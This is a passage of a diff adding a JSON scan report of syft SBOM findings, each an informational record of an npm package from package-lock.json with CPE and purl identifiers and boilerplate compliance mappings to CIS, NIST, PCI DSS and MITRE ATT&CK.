+ "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f48ad70ae4557b5a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/marketplace UNKNOWN", + "title": "@rentaldrivego/marketplace UNKNOWN", + "description": "Package discovered: @rentaldrivego/marketplace UNKNOWN", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "999e66650845f9f4", + "name": "@rentaldrivego/marketplace", + "version": "UNKNOWN", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/marketplace:\\@rentaldrivego\\/marketplace:*:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/marketplace", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "apps/marketplace", + "integrity": "", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "93a5bccb6ac6aa22", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/public-site 1.0.0", + "title": "@rentaldrivego/public-site 1.0.0", + "description": "Package discovered: @rentaldrivego/public-site 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f54f88caa8e97b5c", + "name": "@rentaldrivego/public-site", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public-site:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public-site:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public_site:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public_site:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public:\\@rentaldrivego\\/public-site:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/public:\\@rentaldrivego\\/public_site:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/public-site@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "", + "integrity": "", + "dependencies": { + "@rentaldrivego/types": "*", + "autoprefixer": "^10.4.19", + "dayjs": "^1.11.11", + "lucide-react": "^0.376.0", + "next": "14.2.3", + "postcss": "^8.4.38", + "react": "^18.3.1", + "react-dom": "^18.3.1", + "tailwindcss": "^3.4.3", + "zod": "^3.23.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "308a85ace6addbbf", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/types 1.0.0", + "title": "@rentaldrivego/types 1.0.0", + "description": "Package discovered: @rentaldrivego/types 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ba9eab15fb9d9b6f", + "name": "@rentaldrivego/types", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/types:\\@rentaldrivego\\/types:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/types@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "", + "integrity": "", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7f447d2356272ad6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/types UNKNOWN", + "title": "@rentaldrivego/types UNKNOWN", + "description": "Package discovered: @rentaldrivego/types UNKNOWN", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f26df386702211f3", + "name": "@rentaldrivego/types", + "version": "UNKNOWN", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/types:\\@rentaldrivego\\/types:*:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/types", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "packages/types", + "integrity": "", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4b6c5d98db4a925c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @selderee/plugin-htmlparser2 0.11.0", + "title": "@selderee/plugin-htmlparser2 0.11.0", + "description": "Package discovered: @selderee/plugin-htmlparser2 0.11.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "264d7bf353437253", + "name": "@selderee/plugin-htmlparser2", + "version": "0.11.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@selderee\\/plugin-htmlparser2:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@selderee\\/plugin-htmlparser2:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@selderee\\/plugin_htmlparser2:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@selderee\\/plugin_htmlparser2:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@selderee\\/plugin:\\@selderee\\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@selderee\\/plugin:\\@selderee\\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40selderee/plugin-htmlparser2@0.11.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@selderee/plugin-htmlparser2/-/plugin-htmlparser2-0.11.0.tgz", + "integrity": "sha512-P33hHGdldxGabLFjPPpaTxVolMrzrcegejx+0GxjrIb9Zv48D8yAIA/QTDR2dFl7Uz7urX8aX6+5bCZslr+gWQ==", + "dependencies": { + "domhandler": "^5.0.3", + "selderee": "^0.11.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "96b2d8a0d3d3dca0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @socket.io/component-emitter 3.1.2", + "title": "@socket.io/component-emitter 3.1.2", + "description": "Package discovered: @socket.io/component-emitter 3.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "32ce324a035d4e3a", + "name": "@socket.io/component-emitter", + "version": "3.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@socket.io\\/component-emitter:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@socket.io\\/component-emitter:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@socket.io\\/component_emitter:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@socket.io\\/component_emitter:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@socket.io\\/component:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@socket.io\\/component:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40socket.io/component-emitter@3.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@socket.io/component-emitter/-/component-emitter-3.1.2.tgz", + "integrity": "sha512-9BCxFwvbGg/RsZK9tjXd8s4UcwR0MWeFQ1XEKIQVVvAGJyINdrqKMcTRyLoK8Rse1GjzLV9cwjWV1olXRWEXVA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "de2edab9a58d26f1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @swc/counter 0.1.3", + "title": "@swc/counter 0.1.3", + "description": "Package discovered: @swc/counter 0.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d1ab0047814562a3", + "name": "@swc/counter", + "version": "0.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@swc\\/counter:\\@swc\\/counter:0.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40swc/counter@0.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@swc/counter/-/counter-0.1.3.tgz", + "integrity": "sha512-e2BR4lsJkkRlKZ/qCHPw9ZaSxc0MVUd7gtbtaB7aMvHeJVYe8sOB8DBZkP2DtISHGSku9sCK6T6cnY0CtXrOCQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6291224f1bf77e3f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @swc/helpers 0.5.21", + "title": "@swc/helpers 0.5.21", + "description": "Package discovered: @swc/helpers 0.5.21", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f2d04f064acf1b61", + "name": "@swc/helpers", + "version": "0.5.21", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@swc\\/helpers:\\@swc\\/helpers:0.5.21:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40swc/helpers@0.5.21", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.21.tgz", + "integrity": "sha512-jI/VAmtdjB/RnI8GTnokyX7Ug8c+g+ffD6QRLa6XQewtnGyukKkKSk3wLTM3b5cjt1jNh9x0jfVlagdN2gDKQg==", + "dependencies": { + "tslib": "^2.8.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ec0bf772439a91e3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @swc/helpers 0.5.5", + "title": "@swc/helpers 0.5.5", + "description": "Package discovered: @swc/helpers 0.5.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "72bc47189d44cca0", + "name": "@swc/helpers", + "version": "0.5.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@swc\\/helpers:\\@swc\\/helpers:0.5.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40swc/helpers@0.5.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.5.tgz", + "integrity": "sha512-KGYxvIOXcceOAbEk4bi/dVLEK9z8sZ0uBB3Il5b1rhfClSpcX0yfRO0KmTkqR2cnQDymwLB+25ZyMzICg/cm/A==", + "dependencies": { + "@swc/counter": "^0.1.3", + "tslib": "^2.4.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and 